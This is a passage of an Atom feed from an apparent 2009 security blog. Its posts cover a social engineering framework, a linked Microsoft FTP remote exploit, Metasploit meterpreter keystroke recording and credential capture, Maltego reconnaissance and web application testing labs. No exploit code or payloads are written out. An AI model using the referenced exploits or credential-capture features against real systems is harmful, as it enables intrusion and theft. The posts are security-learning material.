src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-8654938604381192424</id><published>2009-09-17T00:03:00.001-07:00</published><updated>2009-09-17T00:03:59.308-07:00</updated><title type='text'>Social Engineering Framework</title><content type='html'>Well if you cant exploit a system, maybe u can exploit the users. This framework has been created by muts(creator of backtrack), Chris Hadnagy, hdm and others&lt;br /&gt;&lt;br /&gt;Official website is http://www.social-engineer.org&lt;br /&gt;&lt;br /&gt;Also check next tuesday for the new metasploit unleashed course at offensive security. seems juicy. Take a look at the teaser here&lt;br /&gt;&lt;br /&gt;http://www.offensive-security.com/blog/offsec/metasploit-unleashed-information-security-training-at-its-best/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Happy hacking.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-8654938604381192424?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/8654938604381192424/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/09/social-engineering-framework.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/8654938604381192424'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/8654938604381192424'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/09/social-engineering-framework.html' title='Social Engineering Framework'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-3998024482704098276</id><published>2009-09-03T23:06:00.000-07:00</published><updated>2009-09-03T23:16:12.836-07:00</updated><title type='text'>Microsoft Ftp Remote Exploit</title><content type='html'>M bk, :). Kingcope on monday published a remote microsoft ftp exploit which affects windows 2000 sp4. Muts (creator of backtrack) modified and wrote a perl script for the same exploit. It can be found &lt;a href =http://milw0rm.com/exploits/9559 &gt;here&lt;/a&gt;. He also created a video showing the use of the exploit. Video is located &lt;a href ="http://www.offensive-security.com/videos/microsoft-ftp-server-remote-exploit/msftp.html" &gt;here&lt;/a&gt;. On windows 2003, the exploit is rumoured to cause a dos. So patch up or be owned.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-3998024482704098276?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/3998024482704098276/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/09/microsoft-ftp-remote-exploit.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/3998024482704098276'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/3998024482704098276'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/09/microsoft-ftp-remote-exploit.html' title='Microsoft Ftp Remote Exploit'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-4504763921882844487</id><published>2009-03-27T06:12:00.000-07:00</published><updated>2009-03-27T06:48:15.603-07:00</updated><title type='text'>Metasploit New Advanced features</title><content type='html'>Metasploit staff has been working overtime and have added some new kewl features. Some of these features include remote keystroke recording with meterpreter and also you can be able to capture a login credential for those nasty admins who have "cheeky" passwords. I have tried out both methods in my "Lab" and they work perfectly.&lt;br /&gt;To get these new features, just do a svn update and in your "Lab" try out the new advanced meterpreter. Thanks to hdm and to the metasploit crew.&lt;br /&gt;If you want the exact commands you can use, please refer to metasploit blog here &lt;a href="http://blog.metasploit.com"&gt; here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Just thot i should also write a small tutorial on autopwn features. will be posting here soon:)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-4504763921882844487?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/4504763921882844487/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/03/mtasploit-new-features.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/4504763921882844487'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/4504763921882844487'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/03/mtasploit-new-features.html' title='Metasploit New Advanced features'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-1850673803786766340</id><published>2009-03-11T04:31:00.000-07:00</published><updated>2009-03-11T04:53:27.837-07:00</updated><title type='text'>Information Gathering</title><content type='html'>Quoting from Syngress Penetration Testers toolkit ,"Information gathering is the most misunderstood stage in the penetration testing process". This is the stage where we try to get as much information about the taget as possible. Thanks to Jonny Long for "Google hacking" and to Sensepost for comming up with tools like jarf-dns and dns-brute to bruteforce domains, but hats off to Roelf T and the team at &lt;a href="http://www.paterva.com"&gt;Paterva&lt;/a&gt; for comming up with &lt;a href="http://www.paterva.com/maltego/"&gt;Maltego&lt;/a&gt;. At a first glance Maltego seems quite simple , but when you study it deeper and use it abit, it becomes the ultimate tool for information gathering. Maltego is able to create transforms for  email address, sub domains, blogs,does information correlation and a lot more cools stuff. You must check it out. If you have no idea where to begin with maltego, these videos will do&lt;br /&gt;&lt;br /&gt;http://ctas.paterva.com/view/Educational_videos&lt;br /&gt;http://ctas.paterva.com/Maltego_Videos/Episode%201/&lt;br /&gt;http://ctas.paterva.com/Maltego_Videos/Episode%202/&lt;br /&gt;http://ctas.paterva.com/Maltego_Videos/Episode%203/&lt;br /&gt;http://ctas.paterva.com/Maltego_Videos/Episode%204/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-1850673803786766340?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/1850673803786766340/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/03/information-gathering.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/1850673803786766340'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/1850673803786766340'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/03/information-gathering.html' title='Information Gathering'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-5095469281761259724</id><published>2009-03-05T22:02:00.000-08:00</published><updated>2009-03-11T04:57:54.568-07:00</updated><title type='text'>Web Application Testing</title><content type='html'>Before performing a web application test, it is key that you first understand the basics of HTTP protocol and how it works to requests sent and to responses received.&lt;br /&gt;You can go for the easier option of firing web application scanners like&lt;br /&gt; &lt;a href="http://www.acunetix.com"&gt;Acunetix&lt;/a&gt;, &lt;a href="http://www.spidynamics.com"&gt;Web Inspect &lt;/a&gt;,&lt;a href="http://www.cirt.net"&gt; Nikto&lt;/a&gt; or any other web vulnerability scanner and they can do the work for you but even vulnerability scanners tend to miss some vulnerabilities.&lt;br /&gt;If you dont have the basics with web application testing, I would suggest you first setup a simple lab with vulnerable web applications. Such applications include the famous Webgoat by OWASP, Foundstone Hacme series and there are also a few other good platforms you can use. Irongeek has documented a good list of vulnerable web applications &lt;a href="http://www.irongeek.com/i.php?page=security/deliberately-insecure-web-applications-for-learning-web-app-security"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;They are quite easy to setup and come with tutorials to guide you through every step, a great learning tool for the beginner and also the expert may see some things they overlook.&lt;br /&gt;There are also some good books on Web application testing , a favourite of mine is by Wrox publishing: Pentesting for web applications. It covers well the basics to the expert stuff.&lt;br /&gt;Fortunately OWASP have come up with a bundled application all in one live cd called the Lab Rat. It contains recent tools like &lt;a href="http://www.lifedork.com/grendel-scan-a-new-web-application-security-scanner-from-defcon.html"&gt;Grendel&lt;/a&gt;, &lt;a href="http://www.paterva.com/maltego/"&gt;Maltego&lt;/a&gt; from the great Roelf T for information Gathering, and a lot of other cool tools. Check out the cd &lt;a href="http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;There are also several tools and plugins you can use during the web application process. My favourite tools are&lt;br /&gt;&lt;a href ="https://addons.mozilla.org/en-US/firefox/addon/966"&gt;Tamper Data&lt;/a&gt;- Firefox plugin to change on the fly data&lt;br /&gt;&lt;a href="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project"&gt;Webscarab&lt;/a&gt; -Great proxy&lt;br /&gt;&lt;a href="http://w3af.sourceforge.net/"&gt;w3af&lt;/a&gt;- Web application attack and auditing framework&lt;br /&gt;&lt;a href="www.cirt.net"&gt;Nikto&lt;/a&gt;- Web vuln scanner&lt;br /&gt;&lt;a href="http://www.grendel-scan.com/download.htm"&gt;Grendel&lt;/a&gt;&lt;br /&gt;&lt;a href="https://addons.mozilla.org/firefox/addon/590"&gt;Show ip&lt;/a&gt;- Firefox plugin to show ip address&lt;br /&gt;&lt;br /&gt;Take time to learn and not to rush through the tutorials offered. the thing is that you understand how its done , not just to break it.&lt;br /&gt;Happy web pentesting learning.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-5095469281761259724?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/5095469281761259724/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/03/web-application-testing.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/5095469281761259724'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/5095469281761259724'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/03/web-application-testing.html' title='Web Application Testing'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-6812074833180419474</id><published>2009-03-02T10:14:00.000-08:00</published><updated>2009-03-02T10:20:52.663-08:00</updated><title type='text'>welcome</title><content type='html'>Hi. Mostly we will dwell on programming and security, but we may diverse.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-6812074833180419474?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/6812074833180419474/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/03/welcome.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/6812074833180419474'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/6812074833180419474'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/03/welcome.html' title='welcome'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry></feed>
